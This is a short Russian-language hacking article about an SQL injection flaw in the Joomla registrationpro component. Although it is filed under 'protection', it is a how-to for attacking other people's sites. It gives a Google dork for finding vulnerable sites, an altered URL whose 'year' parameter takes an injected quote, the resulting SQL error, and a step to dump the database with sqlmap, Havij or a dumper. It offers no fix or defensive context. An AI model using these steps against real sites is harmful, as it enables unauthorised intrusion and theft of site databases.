Главная » Статьи » Защита

Joomla - уязвимость [SqlInjection]
Новое Уязвимость была обнаружена в компоненте registrationpro.
И так:
1. Идем в гугл и в строку поиска вводим (inurl:index.php?option=com_registrationpro).
2. Ищем подходящий сайт и заходим на него.
3. Изменяем URL.

До: www.site.ru/index.php?option=com_registrationpro&view=event&Itemid189=&did=525&Itemid=189
После: www.site.ru//index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021

4.Далее подставляем кавычку и видим следующее:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND MONTH(a.dates) = 6 ORDER BY c.ordering, a.ordering' at line 6 SQL=SELECT a.id, a.parent_id, a.user_id, a.image AS poster, a.dates, a.enddates, a.shortdescription, a.max_attendance, a.times, a.endtimes, a.titel, a.locid, a.status,a.shw_attendees, a.registra, l.club, l.url, l.street, l.plz, l.city, l.country, l.locdescription, c.catname, c.id as catid, c.background FROM #__registrationpro_dates AS a LEFT JOIN #__registrationpro_locate AS l ON l.id = a.locid LEFT JOIN #__registrationpro_categories AS c ON c.id = a.catsid WHERE a.published = 1 AND a.moderating_status = 1 AND c.access IN (1,1) AND a.viewaccess IN (1,1) AND YEAR(a.dates) = 2021' AND MONTH(a.dates) = 6 ORDER BY c.ordering, a.ordering

5. Дальше дампаем всё через dumper или haviji или sqlmap
Категория: Защита | Добавил: Md5Inj (27.08.2016)
Просмотров: 54 | Рейтинг: 0.0/0
Всего комментариев: 0
Добавить комментарий


Код: